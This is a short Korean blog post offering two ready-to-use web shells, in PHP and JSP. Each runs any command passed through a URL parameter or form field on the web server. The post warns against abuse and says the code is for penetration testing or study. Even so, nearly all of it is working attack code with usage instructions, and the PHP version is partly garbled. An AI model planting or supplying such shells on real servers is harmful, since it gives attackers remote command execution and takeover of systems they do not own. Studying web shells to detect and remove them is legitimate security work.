악용하지 마세요!!!
URL에 cmd 명령어 입력하여 실행시키는 웹쉘임.
모의해킹이나 공부할 용도로만 사용함.
/* PHP Version URL CMD WebShell */
/* 사용법 : hxxp://URL/cmd.php?cmd=명령어 */
<?
echo "
<FORM ACTION=$PHP_SELF METHOD=POST>
CMD : <INPUT TYPE=TEXT NAME=command SIZE=40>
<INPUT TYPE=SUBMIT VALUE='Enter'></FORM>
<HR>n<XMP>n$resultn</XMP><HR>";
$command = str_replace("\", "", $command);
echo "<XMP>"; passthru($command); echo "</XMP>";
?>
/* JSP Version URL CMD WebShell */
/* 사용법 : hxxp://URL/cmd.jsp?cmd=명령어 */
<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>
글
댓글 없음:
댓글 쓰기